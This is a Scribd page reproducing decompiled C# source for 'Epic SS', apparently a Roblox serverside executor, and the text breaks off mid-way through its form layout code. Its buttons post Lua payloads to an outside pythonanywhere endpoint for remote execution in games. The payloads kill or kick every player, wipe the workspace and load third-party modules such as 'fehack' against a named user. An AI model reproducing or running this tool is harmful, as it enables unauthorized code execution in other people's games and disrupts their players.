0% found this document useful (0 votes)
5 views17 pages

message (2)

The document is a C# code for a Windows Forms application named Epic SS, which includes a user interface for executing scripts via HTTP requests to a specified URL. The application allows users to load, edit, and send scripts related to game functionalities, particularly for Roblox, with various buttons triggering different script executions. It also handles file operations and user interactions through text boxes, buttons, and checkboxes.

Uploaded by

coolguifanckidd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
5 views17 pages

message (2)

The document is a C# code for a Windows Forms application named Epic SS, which includes a user interface for executing scripts via HTTP requests to a specified URL. The application allows users to load, edit, and send scripts related to game functionalities, particularly for Roblox, with various buttons triggering different script executions. It also handles file operations and user interactions through text boxes, buttons, and checkboxes.

Uploaded by

coolguifanckidd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 17

// Decompiled with JetBrains decompiler

// Type: Epic_SS.Form1
// Assembly: Epic SS, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C1990E3B-2731-4F3C-A58A-D76D476FAD63
// Assembly location: C:\Users\Eric\Desktop\Epic SS\Epic SS.exe

using FastColoredTextBoxNS;
using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Epic_SS
{
public class Form1 : Form
{
private IContainer components = (IContainer) null;
private BackgroundWorker backgroundWorker1;
private TabPage tabPage1;
private Button button1;
private TabControl tabControl1;
private Button button5;
private Button button4;
private Button button2;
private TabPage tabPage3;
private Button button7;
private Button button6;
private ListBox listBox1;
private Button button15;
private Button button14;
private Button button12;
private Button button11;
private Button button10;
private TextBox textBox1;
private Button button16;
private TextBox textBox2;
private Label label4;
private BackgroundWorker backgroundWorker2;
private Button button17;
private Button button19;
private Button button18;
private Button button20;
private TabPage tabPage2;
private TabPage tabPage5;
private CheckBox checkBox4;
private CheckBox checkBox3;
private Button button29;
private Button button28;
private Button button27;
private Button button26;
private Button button25;
private Button button24;
private Button button13;
private Button button30;
private Button button31;
private Panel panel1;
private Label label2;
private Button button8;
private Button button3;
private FastColoredTextBox richTextBox1;
private CheckBox checkBox1;
private Label label3;
private CheckBox checkBox2;
private Button button23;
private FileSystemWatcher fileSystemWatcher1;
private Button button9;

public Form1() => this.InitializeComponent();

private async void button1_Click(object sender, EventArgs e)


{
string script = this.richTextBox1.Text;
await this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
script);
script = (string) null;
}

private async Task SendScript(string url, string content)


{
using (HttpClient client = new HttpClient())
{
client.DefaultRequestHeaders.Add("User-Agent", "CSharpApp/1.0");
var payload = new
{
code = "if not game.Players:FindFirstChild(\"" + this.textBox1.Text +
"\") then return end if not game.Players[\"" + this.textBox1.Text +
"\"]:IsInGroup(36077423) then return end " + content
};
string json = JsonConvert.SerializeObject((object) payload);
StringContent data = new StringContent(json, Encoding.UTF8,
"application/json");
try
{
HttpResponseMessage response = await client.PostAsync(url, (HttpContent)
data);
response = (HttpResponseMessage) null;
}
catch (Exception ex)
{
Console.Write(ex.ToString());
return;
}
payload = null;
json = (string) null;
data = (StringContent) null;
}
}

private void button2_Click(object sender, EventArgs e) =>


this.richTextBox1.Text = "";
private void Form1_Load(object sender, EventArgs e)
{
this.MaximizeBox = false;
this.FormBorderStyle = FormBorderStyle.FixedSingle;
string path = Path.Combine(Application.StartupPath, "Scripts");
if (Directory.Exists(path))
{
this.listBox1.Items.AddRange((object[]) ((IEnumerable<string>)
Directory.GetFiles(path, ".",
SearchOption.TopDirectoryOnly)).Where<string>((Func<string, bool>) (f =>
f.EndsWith(".txt") || f.EndsWith(".lua"))).Select<string, string>(new Func<string,
string>(Path.GetFileName)).ToArray<string>());
}
else
{
int num = (int) MessageBox.Show("The directory '" + path + "' does not
exist.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
}

private void textBox1_TextChanged(object sender, EventArgs e)


{
}

private async void button6_Click(object sender, EventArgs e)


{
string script = "for i,v in pairs(game.Players:GetPlayers()) do
require(100507604132909).Mertish(v.Name) end";
await this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
script);
script = (string) null;
}

private async void button7_Click(object sender, EventArgs e)


{
string script = "spawn(function()local L=game:GetService('Lighting')local
C=Instance.new('ColorCorrectionEffect',L)local function z(X)return
math.acos(math.cos(X*math.pi))/math.pi end local c=0 L.TimeOfDay='15:00' while
wait(0.1)do local col=Color3.fromHSV(z(c),1,1) C.TintColor=col L.Ambient=col
c=c+0.01 end end)";
await this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
script);
script = (string) null;
}

private void listBox1_SelectedIndexChanged(object sender, EventArgs e)


{
if (this.listBox1.SelectedIndex == -1)
return;
string path = Path.Combine(Application.StartupPath, "Scripts",
this.listBox1.SelectedItem.ToString());
if (File.Exists(path))
{
this.richTextBox1.Text = File.ReadAllText(path);
}
else
{
int num = (int) MessageBox.Show("File not found!", "Error",
MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
}

private void button3_Click(object sender, EventArgs e)


{
using (OpenFileDialog openFileDialog = new OpenFileDialog())
{
openFileDialog.Filter = "All files (*.*)|*.*|Lua files (*.lua)|*.lua|Text
files (*.txt)|*.txt";
openFileDialog.Title = "Select a File";
if (openFileDialog.ShowDialog() != DialogResult.OK)
return;
this.richTextBox1.Text = File.ReadAllText(openFileDialog.FileName);
}
}

private async void button4_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(9635947635).load(\"" + this.textBox1.Text + "\")");

private async void button5_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"game.Players['" + this.textBox1.Text + "']:LoadCharacter()");

private void richTextBox1_TextChanged(object sender, EventArgs e)


{
}

private async void button13_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(17181083619)(\"" + this.textBox1.Text + "\")");

private void textBox1_TextChanged_1(object sender, EventArgs e)


{
}

private async void button10_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest", "for i, v in
ipairs(game.Players:GetChildren()) do v.Character.Humanoid.Health = 0 end");

private async void button12_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest", "for i, v in
ipairs(workspace:GetDescendants()) do pcall(function() v:Destroy() end)end local p
= Instance.new(\"Part\", workspace)p.Anchored = true p.Size = Vector3.new(1000, 1,
1000) for i, v in ipairs(game.Players:GetChildren()) do v:LoadCharacter()end");

private async void button11_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(123255432303221):Pload(\"" + this.textBox1.Text + "\")");

private void textBox2_TextChanged(object sender, EventArgs e)


{
}

private void checkBox1_CheckedChanged(object sender, EventArgs e)


{
}

private async void button14_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(13716575182)(\"" + this.textBox1.Text + "\")");

private async void button15_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"Instance.new(\"Hint\", workspace).Text = \"" + this.textBox2.Text + "\"");

private void checkBox1_CheckedChanged_1(object sender, EventArgs e) =>


this.TopMost = true;

private void checkBox2_CheckedChanged(object sender, EventArgs e)


{
this.Opacity = this.checkBox4.Checked ? 0.5 : 1.0;
this.AllowTransparency = true;
}

private void button8_Click(object sender, EventArgs e)


{
using (SaveFileDialog saveFileDialog = new SaveFileDialog())
{
saveFileDialog.Filter = "Lua File|*.lua|Text File|*.txt";
if (saveFileDialog.ShowDialog() != DialogResult.OK)
return;
File.WriteAllText(saveFileDialog.FileName, this.richTextBox1.Text);
}
}

private async void button16_Click(object sender, EventArgs e)


{
await this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(107020204790377).epiclogo(\"" + this.textBox1.Text + "\")");
int num = (int) MessageBox.Show("Username injected", "Inject",
MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
this.label4.Text = "Status: Injected";
this.label4.ForeColor = Color.Green;
}

private void button9_Click(object sender, EventArgs e)


{
int num = (int) MessageBox.Show("Settings", "Settings", MessageBoxButtons.OK,
MessageBoxIcon.Asterisk);
}

private void checkBox3_CheckedChanged(object sender, EventArgs e) =>


this.MinimizeBox = true;

private async void button17_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(18665717275).load(\"" + this.textBox1.Text + "\")");

private async void button19_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest", "for _,v in
pairs(workspace:GetChildren()) do if v:IsA('Hint') then v:Destroy() end end");

private async void button20_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest", "for i, v in
ipairs(game.Players:GetChildren()) do v:Kick() end");

private async void button18_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(5115249013).fehack(\"" + this.textBox1.Text + "\")");

private void button21_Click(object sender, EventArgs e)


{
}

private async void button21_Click_1(object sender, EventArgs e)


{
}

private void button21_Click_2(object sender, EventArgs e) =>


this.richTextBox1.Text = "";

private void checkBox3_CheckedChanged_1(object sender, EventArgs e) =>


this.TopMost = true;

private void checkBox4_CheckedChanged(object sender, EventArgs e)


{
this.Opacity = this.checkBox4.Checked ? 0.5 : 1.0;
this.AllowTransparency = true;
}

private async void button21_Click_3(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(17181083619)(\"" + this.textBox1.Text + "\")");

private void tabPage2_Click(object sender, EventArgs e)


{
}

private async void button22_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(123255432303221):Pload(\"" + this.textBox1.Text + "\")");

private async void button23_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(9036221508).load(\"" + this.textBox1.Text + "\")");

private async void button24_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(17523790773)(\"" + this.textBox1.Text + "\")");

private async void button25_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(4869378421).F3X(\"" + this.textBox1.Text + "\")");

private async void button26_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(11213747230).ambush(\"" + this.textBox1.Text + "\")");

private async void button27_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(139798546651728).load()");

private async void button28_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(12102103065).Patrick(\"" + this.textBox1.Text + "\")");
private async void button29_Click(object sender, EventArgs e) => await
this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(14572394952)(\"" + this.textBox1.Text + "\")");

private async void button30_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(4745872847).load(\"" + this.textBox1.Text + "\")");

private async void button13_Click_1(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(8038037940).CLoad(\"" + this.textBox1.Text + "\")");

private async void button33_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"game.Players['" + this.textBox1.Text + "']:LoadCharacter()");

private async void button32_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest",
"require(9635947635).load(\"" + this.textBox1.Text + "\")");

private void panel2_Paint(object sender, PaintEventArgs e)


{
}

private void button34_Click(object sender, EventArgs e)


{
}

private async void button31_Click(object sender, EventArgs e) => await


this.SendScript("https://wersach.pythonanywhere.com/executeRequest", "for i = 1, 10
do local p = Instance.new(\"Part\") p.Parent = workspace p.Size = Vector3.new(4, 1,
2) p.Color = Color3.fromRGB(math.random(0, 255), math.random(0, 255),
math.random(0, 255)) p.CFrame = CFrame.new(game:GetService(\"Players\")[\"" +
this.textBox1.Text + "\"].Character.HumanoidRootPart.Position +
Vector3.new(0,10,0)) * CFrame.Angles(math.rad(math.random(0,360)),
math.rad(math.random(0,360)), math.rad(math.random(0,360))) end");

private void fastColoredTextBox1_Load(object sender, EventArgs e)


{
}

private void button23_Click_1(object sender, EventArgs e)


{
int num = (int) MessageBox.Show("hello", "wersach", MessageBoxButtons.OK,
MessageBoxIcon.Asterisk);
}

private void checkBox1_CheckedChanged_2(object sender, EventArgs e)


{
int num = (int) MessageBox.Show("Hello", "wersach", MessageBoxButtons.OK,
MessageBoxIcon.Asterisk);
}

private async void button23_Click_2(object sender, EventArgs e) =>


this.textBox2.Text = "epic serverside";

private void textBox2_TextChanged_1(object sender, EventArgs e)


{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}

private void InitializeComponent()


{
this.components = (IContainer) new Container();
ComponentResourceManager componentResourceManager = new
ComponentResourceManager(typeof (Form1));
this.backgroundWorker1 = new BackgroundWorker();
this.tabPage1 = new TabPage();
this.richTextBox1 = new FastColoredTextBox();
this.label4 = new Label();
this.button16 = new Button();
this.textBox1 = new TextBox();
this.button9 = new Button();
this.button8 = new Button();
this.button3 = new Button();
this.listBox1 = new ListBox();
this.button5 = new Button();
this.button4 = new Button();
this.button2 = new Button();
this.button1 = new Button();
this.tabControl1 = new TabControl();
this.tabPage3 = new TabPage();
this.button23 = new Button();
this.button31 = new Button();
this.button20 = new Button();
this.button19 = new Button();
this.button18 = new Button();
this.button17 = new Button();
this.button15 = new Button();
this.button14 = new Button();
this.button12 = new Button();
this.button11 = new Button();
this.button10 = new Button();
this.button7 = new Button();
this.button6 = new Button();
this.panel1 = new Panel();
this.label2 = new Label();
this.textBox2 = new TextBox();
this.tabPage2 = new TabPage();
this.button30 = new Button();
this.button29 = new Button();
this.button28 = new Button();
this.button27 = new Button();
this.button26 = new Button();
this.button25 = new Button();
this.button24 = new Button();
this.button13 = new Button();
this.tabPage5 = new TabPage();
this.label3 = new Label();
this.checkBox2 = new CheckBox();
this.checkBox1 = new CheckBox();
this.checkBox4 = new CheckBox();
this.checkBox3 = new CheckBox();
this.backgroundWorker2 = new BackgroundWorker();
this.fileSystemWatcher1 = new FileSystemWatcher();
this.tabPage1.SuspendLayout();
((ISupportInitialize) this.richTextBox1).BeginInit();
this.tabControl1.SuspendLayout();
this.tabPage3.SuspendLayout();
this.panel1.SuspendLayout();
this.tabPage2.SuspendLayout();
this.tabPage5.SuspendLayout();
this.fileSystemWatcher1.BeginInit();
this.SuspendLayout();
this.tabPage1.Controls.Add((Control) this.richTextBox1);
this.tabPage1.Controls.Add((Control) this.label4);
this.tabPage1.Controls.Add((Control) this.button16);
this.tabPage1.Controls.Add((Control) this.textBox1);
this.tabPage1.Controls.Add((Control) this.button9);
this.tabPage1.Controls.Add((Control) this.button8);
this.tabPage1.Controls.Add((Control) this.button3);
this.tabPage1.Controls.Add((Control) this.listBox1);
this.tabPage1.Controls.Add((Control) this.button5);
this.tabPage1.Controls.Add((Control) this.button4);
this.tabPage1.Controls.Add((Control) this.button2);
this.tabPage1.Controls.Add((Control) this.button1);
this.tabPage1.Location = new Point(4, 22);
this.tabPage1.Name = "tabPage1";
this.tabPage1.Padding = new Padding(3);
this.tabPage1.Size = new Size(644, 385);
this.tabPage1.TabIndex = 0;
this.tabPage1.Text = "Executor";
this.tabPage1.UseVisualStyleBackColor = true;
this.richTextBox1.AutoCompleteBracketsList = new char[10]
{
'(',
')',
'{',
'}',
'[',
']',
'"',
'"',
'\'',
'\''
};
this.richTextBox1.AutoScrollMinSize = new Size(27, 14);
this.richTextBox1.BackBrush = (Brush) null;
this.richTextBox1.BookmarkColor = Color.Yellow;
this.richTextBox1.CharCnWidth = 16;
this.richTextBox1.CharHeight = 14;
this.richTextBox1.CharWidth = 8;
this.richTextBox1.Cursor = Cursors.IBeam;
this.richTextBox1.DisabledColor = Color.FromArgb(100, 180, 180, 180);
this.richTextBox1.Font = new Font("Courier New", 9.75f);
this.richTextBox1.IsReplaceMode = false;
this.richTextBox1.LineNumberColor = Color.Black;
this.richTextBox1.Location = new Point(149, 6);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.Paddings = new Padding(0);
this.richTextBox1.SelectionColor = Color.FromArgb(60, 0, 0, (int)
byte.MaxValue);
this.richTextBox1.ServiceColors = (ServiceColors)
componentResourceManager.GetObject("richTextBox1.ServiceColors");
this.richTextBox1.Size = new Size(495, 316);
this.richTextBox1.TabIndex = 14;
this.richTextBox1.Zoom = 100;
this.richTextBox1.Load += new EventHandler(this.fastColoredTextBox1_Load);
this.label4.AutoSize = true;
this.label4.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.label4.ForeColor = Color.Red;
this.label4.Location = new Point(146, 325);
this.label4.Name = "label4";
this.label4.Size = new Size(121, 13);
this.label4.TabIndex = 13;
this.label4.Text = "Status: Not Injected";
this.button16.FlatStyle = FlatStyle.Popup;
this.button16.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button16.Location = new Point(432, 356);
this.button16.Name = "button16";
this.button16.Size = new Size(93, 24);
this.button16.TabIndex = 12;
this.button16.Text = "Enter";
this.button16.UseVisualStyleBackColor = true;
this.button16.Click += new EventHandler(this.button16_Click);
this.textBox1.Font = new Font("Consolas", 9f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.textBox1.Location = new Point(149, 356);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new Size(277, 22);
this.textBox1.TabIndex = 11;
this.textBox1.Text = "Username";
this.textBox1.TextChanged += new EventHandler(this.textBox1_TextChanged_1);
this.button9.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button9.Location = new Point(6, 117);
this.button9.Name = "button9";
this.button9.Size = new Size(137, 21);
this.button9.TabIndex = 9;
this.button9.Text = "Settings";
this.button9.UseVisualStyleBackColor = true;
this.button9.Click += new EventHandler(this.button9_Click);
this.button8.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button8.Location = new Point(6, 90);
this.button8.Name = "button8";
this.button8.Size = new Size(137, 21);
this.button8.TabIndex = 8;
this.button8.Text = "Save File";
this.button8.UseVisualStyleBackColor = true;
this.button8.Click += new EventHandler(this.button8_Click);
this.button3.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button3.Location = new Point(6, 63);
this.button3.Name = "button3";
this.button3.Size = new Size(137, 21);
this.button3.TabIndex = 7;
this.button3.Text = "Open File";
this.button3.UseVisualStyleBackColor = true;
this.button3.Click += new EventHandler(this.button3_Click);
this.listBox1.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.listBox1.FormattingEnabled = true;
this.listBox1.ItemHeight = 14;
this.listBox1.Location = new Point(6, 147);
this.listBox1.Name = "listBox1";
this.listBox1.Size = new Size(137, 228);
this.listBox1.TabIndex = 6;
this.listBox1.SelectedIndexChanged += new
EventHandler(this.listBox1_SelectedIndexChanged);
this.button5.FlatStyle = FlatStyle.Popup;
this.button5.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button5.Location = new Point(586, 356);
this.button5.Name = "button5";
this.button5.Size = new Size(49, 24);
this.button5.TabIndex = 5;
this.button5.Text = "RE";
this.button5.UseVisualStyleBackColor = true;
this.button5.Click += new EventHandler(this.button5_Click);
this.button4.FlatStyle = FlatStyle.Popup;
this.button4.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button4.Location = new Point(531, 356);
this.button4.Name = "button4";
this.button4.Size = new Size(49, 24);
this.button4.TabIndex = 4;
this.button4.Text = "R6";
this.button4.UseVisualStyleBackColor = true;
this.button4.Click += new EventHandler(this.button4_Click);
this.button2.Font = new Font("Consolas", 9f, FontStyle.Bold);
this.button2.Location = new Point(6, 36);
this.button2.Name = "button2";
this.button2.Size = new Size(137, 21);
this.button2.TabIndex = 1;
this.button2.Text = "Clear";
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new EventHandler(this.button2_Click);
this.button1.Font = new Font("Consolas", 9f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button1.Location = new Point(3, 6);
this.button1.Name = "button1";
this.button1.Size = new Size(140, 24);
this.button1.TabIndex = 0;
this.button1.Text = "Execute";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new EventHandler(this.button1_Click);
this.tabControl1.Controls.Add((Control) this.tabPage1);
this.tabControl1.Controls.Add((Control) this.tabPage3);
this.tabControl1.Controls.Add((Control) this.tabPage2);
this.tabControl1.Controls.Add((Control) this.tabPage5);
this.tabControl1.Location = new Point(5, 3);
this.tabControl1.Name = "tabControl1";
this.tabControl1.SelectedIndex = 0;
this.tabControl1.Size = new Size(652, 411);
this.tabControl1.TabIndex = 0;
this.tabPage3.Controls.Add((Control) this.button23);
this.tabPage3.Controls.Add((Control) this.button31);
this.tabPage3.Controls.Add((Control) this.button20);
this.tabPage3.Controls.Add((Control) this.button19);
this.tabPage3.Controls.Add((Control) this.button18);
this.tabPage3.Controls.Add((Control) this.button17);
this.tabPage3.Controls.Add((Control) this.button15);
this.tabPage3.Controls.Add((Control) this.button14);
this.tabPage3.Controls.Add((Control) this.button12);
this.tabPage3.Controls.Add((Control) this.button11);
this.tabPage3.Controls.Add((Control) this.button10);
this.tabPage3.Controls.Add((Control) this.button7);
this.tabPage3.Controls.Add((Control) this.button6);
this.tabPage3.Controls.Add((Control) this.panel1);
this.tabPage3.Location = new Point(4, 22);
this.tabPage3.Name = "tabPage3";
this.tabPage3.Padding = new Padding(3);
this.tabPage3.Size = new Size(644, 385);
this.tabPage3.TabIndex = 2;
this.tabPage3.Text = "Admin Panel";
this.tabPage3.UseVisualStyleBackColor = true;
this.button23.FlatStyle = FlatStyle.Popup;
this.button23.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button23.Location = new Point(6, 276);
this.button23.Name = "button23";
this.button23.Size = new Size(618, 35);
this.button23.TabIndex = 16;
this.button23.Text = "Epic Serverside";
this.button23.UseVisualStyleBackColor = true;
this.button23.Click += new EventHandler(this.button23_Click_2);
this.button31.FlatStyle = FlatStyle.Popup;
this.button31.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button31.Location = new Point(474, 6);
this.button31.Name = "button31";
this.button31.Size = new Size(150, 84);
this.button31.TabIndex = 15;
this.button31.Text = "Spawn parts";
this.button31.UseVisualStyleBackColor = true;
this.button31.Click += new EventHandler(this.button31_Click);
this.button20.FlatStyle = FlatStyle.Popup;
this.button20.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button20.Location = new Point(318, 96);
this.button20.Name = "button20";
this.button20.Size = new Size(150, 84);
this.button20.TabIndex = 13;
this.button20.Text = "Shutdown";
this.button20.UseVisualStyleBackColor = true;
this.button20.Click += new EventHandler(this.button20_Click);
this.button19.FlatStyle = FlatStyle.Popup;
this.button19.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button19.Location = new Point(162, 96);
this.button19.Name = "button19";
this.button19.Size = new Size(150, 84);
this.button19.TabIndex = 12;
this.button19.Text = "Clear Hint";
this.button19.UseVisualStyleBackColor = true;
this.button19.Click += new EventHandler(this.button19_Click);
this.button18.FlatStyle = FlatStyle.Popup;
this.button18.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button18.Location = new Point(474, 186);
this.button18.Name = "button18";
this.button18.Size = new Size(150, 84);
this.button18.TabIndex = 11;
this.button18.Text = "Dogs Army";
this.button18.UseVisualStyleBackColor = true;
this.button18.Click += new EventHandler(this.button18_Click);
this.button17.FlatStyle = FlatStyle.Popup;
this.button17.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button17.Location = new Point(474, 96);
this.button17.Name = "button17";
this.button17.Size = new Size(150, 84);
this.button17.TabIndex = 10;
this.button17.Text = "Grab knife v4";
this.button17.UseVisualStyleBackColor = true;
this.button17.Click += new EventHandler(this.button17_Click);
this.button15.FlatStyle = FlatStyle.Popup;
this.button15.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button15.Location = new Point(6, 96);
this.button15.Name = "button15";
this.button15.Size = new Size(150, 84);
this.button15.TabIndex = 7;
this.button15.Text = "Hint";
this.button15.UseVisualStyleBackColor = true;
this.button15.Click += new EventHandler(this.button15_Click);
this.button14.FlatStyle = FlatStyle.Popup;
this.button14.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button14.Location = new Point(6, 186);
this.button14.Name = "button14";
this.button14.Size = new Size(150, 84);
this.button14.TabIndex = 6;
this.button14.Text = "Secret Panel";
this.button14.UseVisualStyleBackColor = true;
this.button14.Click += new EventHandler(this.button14_Click);
this.button12.FlatStyle = FlatStyle.Popup;
this.button12.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button12.Location = new Point(162, 6);
this.button12.Name = "button12";
this.button12.Size = new Size(150, 84);
this.button12.TabIndex = 4;
this.button12.Text = "Baseplate";
this.button12.UseVisualStyleBackColor = true;
this.button12.Click += new EventHandler(this.button12_Click);
this.button11.FlatStyle = FlatStyle.Popup;
this.button11.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button11.Location = new Point(318, 186);
this.button11.Name = "button11";
this.button11.Size = new Size(150, 84);
this.button11.TabIndex = 3;
this.button11.Text = "Polaria";
this.button11.UseVisualStyleBackColor = true;
this.button11.Click += new EventHandler(this.button11_Click);
this.button10.FlatStyle = FlatStyle.Popup;
this.button10.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button10.Location = new Point(318, 6);
this.button10.Name = "button10";
this.button10.Size = new Size(150, 84);
this.button10.TabIndex = 2;
this.button10.Text = "Kill All";
this.button10.UseVisualStyleBackColor = true;
this.button10.Click += new EventHandler(this.button10_Click);
this.button7.FlatStyle = FlatStyle.Popup;
this.button7.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button7.Location = new Point(162, 186);
this.button7.Name = "button7";
this.button7.Size = new Size(150, 84);
this.button7.TabIndex = 1;
this.button7.Text = "Disco";
this.button7.UseVisualStyleBackColor = true;
this.button7.Click += new EventHandler(this.button7_Click);
this.button6.FlatStyle = FlatStyle.Popup;
this.button6.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button6.Location = new Point(6, 6);
this.button6.Name = "button6";
this.button6.Size = new Size(150, 84);
this.button6.TabIndex = 0;
this.button6.Text = "Obunga";
this.button6.UseVisualStyleBackColor = true;
this.button6.Click += new EventHandler(this.button6_Click);
this.panel1.BorderStyle = BorderStyle.FixedSingle;
this.panel1.Controls.Add((Control) this.label2);
this.panel1.Controls.Add((Control) this.textBox2);
this.panel1.Location = new Point(0, 345);
this.panel1.Name = "panel1";
this.panel1.Size = new Size(624, 34);
this.panel1.TabIndex = 14;
this.label2.AutoSize = true;
this.label2.Font = new Font("Arial", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.label2.Location = new Point(9, 7);
this.label2.Name = "label2";
this.label2.Size = new Size(15, 16);
this.label2.TabIndex = 8;
this.label2.Text = ">";
this.textBox2.BorderStyle = BorderStyle.None;
this.textBox2.Font = new Font("Consolas", 11.25f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.textBox2.Location = new Point(26, 7);
this.textBox2.Name = "textBox2";
this.textBox2.Size = new Size(593, 18);
this.textBox2.TabIndex = 9;
this.textBox2.Text = "Hello";
this.textBox2.TextChanged += new EventHandler(this.textBox2_TextChanged_1);
this.tabPage2.Controls.Add((Control) this.button30);
this.tabPage2.Controls.Add((Control) this.button29);
this.tabPage2.Controls.Add((Control) this.button28);
this.tabPage2.Controls.Add((Control) this.button27);
this.tabPage2.Controls.Add((Control) this.button26);
this.tabPage2.Controls.Add((Control) this.button25);
this.tabPage2.Controls.Add((Control) this.button24);
this.tabPage2.Controls.Add((Control) this.button13);
this.tabPage2.Location = new Point(4, 22);
this.tabPage2.Name = "tabPage2";
this.tabPage2.Padding = new Padding(3);
this.tabPage2.Size = new Size(644, 385);
this.tabPage2.TabIndex = 4;
this.tabPage2.Text = "Packages";
this.tabPage2.UseVisualStyleBackColor = true;
this.tabPage2.Click += new EventHandler(this.tabPage2_Click);
this.button30.FlatStyle = FlatStyle.Popup;
